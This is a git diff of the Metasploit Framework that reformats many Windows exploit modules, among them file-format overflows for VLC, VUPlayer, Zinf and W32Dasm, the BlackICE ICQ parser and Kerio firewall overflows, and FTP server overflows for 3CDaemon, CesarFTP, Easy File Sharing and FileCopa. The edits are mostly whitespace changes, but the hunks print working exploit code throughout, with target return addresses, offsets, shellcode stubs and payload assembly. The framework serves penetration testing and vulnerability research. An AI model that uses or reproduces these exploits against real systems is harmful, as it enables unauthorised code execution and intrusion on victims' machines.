a/modules/exploits/windows/fileformat/ultraiso_cue.rb 
+++ b/modules/exploits/windows/fileformat/ultraiso_cue.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote # The EXE base addr contains a bad char (nul). This prevents us from # writing data after the return address. NOTE: An SEH exploit was # originally created for this vuln, but was tossed in favor of using - # the return address method instead. This is due to the offset being + # the return address method instead. This is due to the offset being # stable across different open methods. [ 'Windows - UltraISO v8.6.2.2011 portable', diff --git a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb index 703cabc67d..9fc3243b26 100644 --- a/modules/exploits/windows/fileformat/ursoft_w32dasm.rb +++ b/modules/exploits/windows/fileformat/ursoft_w32dasm.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -15,16 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'URSoft W32Dasm Disassembler Function Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in W32Dasm <= v8.93. - By creating a malicious file and convincing a user to disassemble - the file with a vulnerable version of W32Dasm, the Imports/Exports - function is copied to the stack and arbitrary code may be executed - locally as the user. + By creating a malicious file and convincing a user to disassemble + the file with a vulnerable version of W32Dasm, the Imports/Exports + function is copied to the stack and arbitrary code may be executed + locally as the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'patrick' ], 
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 256, @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP SP0', { 'Ret' => 0x77e6de9c } ], # jmp esp kernel32.dll ], @@ -55,11 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jan 24 2005', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf-w32dasm.exe']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf-w32dasm.exe']), + ], self.class) end def exploit diff --git a/modules/exploits/windows/fileformat/videolan_tivo.rb b/modules/exploits/windows/fileformat/videolan_tivo.rb index d8dc34c545..9629f79829 100644 --- a/modules/exploits/windows/fileformat/videolan_tivo.rb +++ b/modules/exploits/windows/fileformat/videolan_tivo.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -11,14 +15,14 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'VideoLAN VLC TiVo Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in VideoLAN VLC 0.9.4. - By creating a malicious TY file, a remote attacker could overflow a - buffer and execute arbitrary code. + By creating a malicious TY file, a remote attacker could overflow a + buffer and execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => 'MC', 
@@ -32,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 550, @@ -40,43 +44,42 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'VideoLAN VLC 0.9.4 (XP SP3 English)', { 'Ret' => 0x6a575cad } ], - [ 'VideoLAN VLC 0.9.2 (XP SP3 English)', { 'Ret' => 0x65473351 } ], + [ 'VideoLAN VLC 0.9.2 (XP SP3 English)', { 'Ret' => 0x65473351 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 22 2008', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'msf.ty']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.ty']), + ], self.class) end def exploit - ty = "\xF5\x46\x7A\xBD" + ty = "\xF5\x46\x7A\xBD" ty << "\x00\x00\x00\x02" - ty << "\x00\x02\x00\x00" + ty << "\x00\x02\x00\x00" ty << "\x00" * 8 - ty << "\x00\x00\x05\x41" - ty << "\x00" * 4 - ty << "\x00\x00\x05\x49" - ty << "\x00" * 60 + ty << "\x00\x00\x05\x41" + ty << "\x00" * 4 + ty << "\x00\x00\x05\x49" + ty << "\x00" * 60 ty << [target.ret].pack('V') + payload.encoded + make_nops(12) - ty << "\x00" * (130980 - 4 - payload.encoded.length - 12) - ty << "\x05" - ty << "\x00" * 3 - ty << "\x05" - ty << "\x00" * 1 - ty << "\x09" - ty << "\xc0" + ty << "\x00" * (130980 - 4 - payload.encoded.length - 12) + ty << "\x05" + ty << "\x00" * 3 + ty << "\x05" + ty << "\x00" * 1 + ty << "\x09" + ty << "\xc0" ty << "\x00" * 14 - ty << "\x06" - ty << "\xe0" + ty << "\x06" + ty << "\xe0" ty << "\x00" * 302004 print_status("Creating '#{datastore['FILENAME']}' file ...") diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index d76c2e579c..d3bcbb9457 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb 
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'DisableNops' => true, 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, - 'EncoderOptions' => + 'EncoderOptions' => { 'BufferRegister' => 'ESI', } @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote # add esp,0xcc / pop ebx / pop esi / pop edi / pop ebp / ret # esi is used as our buffer register, and also becomes eip # (there are two copies of the pointer on the stack) - 'Ret' => 0x6b54543e, + 'Ret' => 0x6b54543e, } ], ], @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote host,share = psz_remote[2,psz_remote.length].split("\\") path = "smb://%s@%s/%s/" % [payload.encoded, host, share] sploit = template.gsub(/REPLACE_ME/, path) - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) diff --git a/modules/exploits/windows/fileformat/vuplayer_m3u.rb b/modules/exploits/windows/fileformat/vuplayer_m3u.rb index dabd3010b4..5dda512419 100644 --- a/modules/exploits/windows/fileformat/vuplayer_m3u.rb +++ b/modules/exploits/windows/fileformat/vuplayer_m3u.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -11,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT - + def initialize(info = {}) super(update_info(info, 'Name' => 'VUPlayer M3U Buffer Overflow', @@ -30,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - }, + }, 'Payload' => { 'Space' => 750, 
@@ -39,19 +43,18 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ], + [ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 18 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), - ], self.class) - + register_options( + [ + OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']), + ], self.class) end def exploit @@ -61,11 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote m3u[1012,4] = [target.ret].pack('V') m3u[1016,12] = "\x90" * 12 m3u[1028,payload.encoded.length] = payload.encoded - + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(m3u) - + end end diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index e6089e409f..27abf20bb1 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ 
@@ -22,10 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Zinf Audio Player 2.2.1 (PLS File) Stack Overflow.', 'Description' => %q{ This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. - An attacker must send the file to victim and the victim must open the file. - Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Zinf. - This functionality has not been tested in this module. + An attacker must send the file to victim and the victim must open the file. + Alternatively it may be possible to execute code remotely via an embedded + PLS file within a browser, when the PLS extention is registered to Zinf. + This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ', 'patrick' ], @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Tested by patrick - 20090429 xpsp3 [ 'Zinf Universal 2.2.1', { 'Ret' => 0x1204f514 } ], #pop esi; pop ebx; ret - ./Plugins/zinf.ui @@ -54,10 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => '24 Sep 2004', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('FILENAME', [ true, 'The file name.', 'exploit_zinf.pls']), - ], self.class) + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'exploit_zinf.pls']), + ], self.class) end diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index 20565ee89a..db0a4d3802 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -22,20 +20,20 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'ISS PAM.dll ICQ Parser Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in the ISS products that use - the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation - will result in arbitrary code execution as LocalSystem. This exploit - only requires 1 UDP packet, which can be both spoofed and sent to a broadcast - address. + This module exploits a stack overflow in the ISS products that use + the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation + will result in arbitrary code execution as LocalSystem. This exploit + only requires 1 UDP packet, which can be both spoofed and sent to a broadcast + address. - The ISS exception handler will recover the process after each overflow, giving - us the ability to bruteforce the service and exploit it multiple times. + The ISS exception handler will recover the process after each overflow, giving + us the ability to bruteforce the service and exploit it multiple times. }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2004-0362'], ['OSVDB', '4355'], ['URL', 'http://www.eeye.com/html/Research/Advisories/AD20040318.html'], 
@@ -55,26 +53,26 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Bruteforce', { } ], [ 'Bruteforce iis-pam1.dll', { 'Targets' => 3 .. 4 } ], [ 'Bruteforce NT 4.0', { 'Targets' => 5 .. 15 } ], - [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ], - [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ], - [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ], - [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ], - [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ], - [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ], - [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ], - [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ], - [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ], - [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ], - [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ], - [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ], + [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ], + [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ], + [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ], + [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ], + [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ], + [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ], + [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ], + [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ], + [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ], + [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ], + [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ], + [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ], [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ], - [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ], - [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ], - [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ], + [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ], + [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ], + [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ], - [ 
'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], - [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ], - [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ], + [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], + [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ], + [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ], ], 'DisclosureDate' => 'Mar 18 2004', 'DefaultTarget' => 0)) @@ -116,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # (skape) if it doesn't work! packet = # SRV_MULTI - [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + + [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + # SRV_USER_ONLINE [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') + [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') + @@ -126,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote "\x00\x00" + # nick length / nick "\x00\x00" + # first length / first "\x00\x00" + # last length / last - [email.length].pack('v') + email + + [email.length].pack('v') + email + "\x00\x00\x00\x00\x00\x00\x00" print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)") diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index 57fec55c7f..e6e2022e6b 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb 
@@ -3,36 +3,32 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp - def initialize(info = {}) super(update_info(info, 'Name' => 'Kerio Firewall 2.1.4 Authentication Packet Overflow', 'Description' => %q{ - This module exploits a stack overflow in Kerio Personal Firewall - administration authentication process. This module has only been tested + This module exploits a stack overflow in Kerio Personal Firewall + administration authentication process. This module has only been tested against Kerio Personal Firewall 2 (2.1.4). - }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2003-0220'], ['OSVDB', '6294'], ['BID', '7180'], @@ -49,25 +45,20 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', - 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ], - [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], + [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ], ], - 'Privileged' => true, - 'DisclosureDate' => 'April 28 2003', - 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(44334) - ], self.class) - + register_options( + [ + Opt::RPORT(44334) + ], self.class) end def exploit diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index 6000b1452f..e5b0e41582 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,14 +18,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow', 'Description' => %q{ - This module exploits a vulnerability in the 3Com 3CDaemon + This module exploits a vulnerability in the 3Com 3CDaemon FTP service. This package is being distributed from the 3Com web site and is recommended in numerous support documents. This module uses the USER command to trigger the overflow. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -39,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '12811'], [ 'BID', '12155'], [ 'URL', 'ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip'], - ], 'Privileged' => false, 'Payload' => @@ -51,11 +47,10 @@ class Metasploit3 < Msf::Exploit::Remote { 'ConnectionType' => "-find" } - }, - 'Targets' => + 'Targets' => [ - [ + [ 'Windows 2000 English', # Tested OK - hdm 11/24/2005 { 'Platform' => 'win', 
@@ -74,40 +69,40 @@ class Metasploit3 < Msf::Exploit::Remote { 'Platform' => 'win', 'Ret' => 0x77681799, # ws2help.dll - }, + }, ], - [ - 'Windows 2000 Pro SP4 French', + [ + 'Windows 2000 Pro SP4 French', { 'Platform' => 'win', 'Ret' => 0x775F29D0, - }, + }, ], - + ], 'DisclosureDate' => 'Jan 4 2005')) end def check connect - disconnect + disconnect if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end def exploit connect - + print_status("Trying target #{target.name}...") buf = rand_text_english(2048, payload_badchars) - seh = generate_seh_payload(target.ret) + seh = generate_seh_payload(target.ret) buf[229, seh.length] = seh send_cmd( ['USER', buf] , false ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index ee2e3f89e3..1809f9ef19 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Cesar FTP 0.99g MKD Command Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the MKD verb in CesarFTP 0.99g. - - You must have valid credentials to trigger this vulnerability. Also, you + + You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully. }, 'Author' => 'MC', 
@@ -49,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ], [ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ], @@ -64,19 +62,19 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - disconnect - + disconnect + if (banner =~ /CesarFTP 0\.99g/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect_login - sploit = "\n" * 671 + rand_text_english(3, payload_badchars) - sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded + sploit = "\n" * 671 + rand_text_english(3, payload_badchars) + sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index d49a08136e..ff0081e79f 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -3,25 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BolinTech Dream FTP Server 1.02 Format String', 'Description' => %q{ - This module exploits a format string overflow in the BolinTech + This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined. }, 'Author' => [ 'Patrick Webster ' ], 
@@ -45,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en. + # Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en. [ 'Dream FTP Server v1.02 Universal', { @@ -55,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Mar 03 2004', 'DefaultTarget' => 0)) - - register_options( + + register_options( [ Opt::RPORT(21), ], self.class) @@ -71,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote end return Exploit::CheckCode::Safe end - + def exploit connect sleep(0.25) diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index a9a04cf818..98903dfe7b 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -3,23 +3,21 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Easy File Sharing FTP Server 2.0 PASS Overflow', 'Description' => %q{ This module exploits a stack overflow in the Easy File Sharing 2.0 
@@ -48,38 +46,38 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', 'Targets' => - [ - [ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ], - [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], - ], + [ + [ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ], + [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], + ], 'DisclosureDate' => 'Jul 31 2006', 'DefaultTarget' => 0)) end - def check - connect - disconnect + def check + connect + disconnect + + if (banner =~ /Easy File Sharing FTP Server/) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe + end - if (banner =~ /Easy File Sharing FTP Server/) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe - end - def exploit connect - filler = rand_text_english(2559) + "\xeb\x12" + filler = rand_text_english(2559) + "\xeb\x12" filler << make_nops(2) + [target.ret].pack('V') - - sploit = "\x2c" + filler + payload.encoded + + sploit = "\x2c" + filler + payload.encoded print_status("Trying target #{target.name}...") # needs anonymous to be set. send_cmd(['USER', "anonymous"], true) send_cmd(['PASS', sploit], false) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index 77b18b519a..8076d8ff04 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb 
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 - and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which + and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index 64edf00cef..6ce525be7d 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -7,11 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'FileCopa FTP Server pre 18 Jul Version', 'Description' => %q{ - This module exploits the buffer overflow found in the LIST command - in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch + This module exploits the buffer overflow found in the LIST command + in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch }, 'Author' => [ 'Jacopo Cervini' ], 'License' => MSF_LICENSE, 
@@ -31,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2k Server SP4 English', { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp [ 'Windows XP Pro SP2 Italian', { 'Ret' => 0x77f62740, 'Nops' => 240 } ] # jmp esp @@ -40,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) end - + def exploit connect_login @@ -48,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "A " sploit << make_nops(target['Nops']) - sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded + sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded send_cmd( ['LIST', sploit] , false) diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index a4cc33205e..405ff00406 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -20,13 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'freeFTPd 1.0 Username Overflow', 'Description' => %q{ - This module exploits a stack overflow in the freeFTPd + This module exploits a 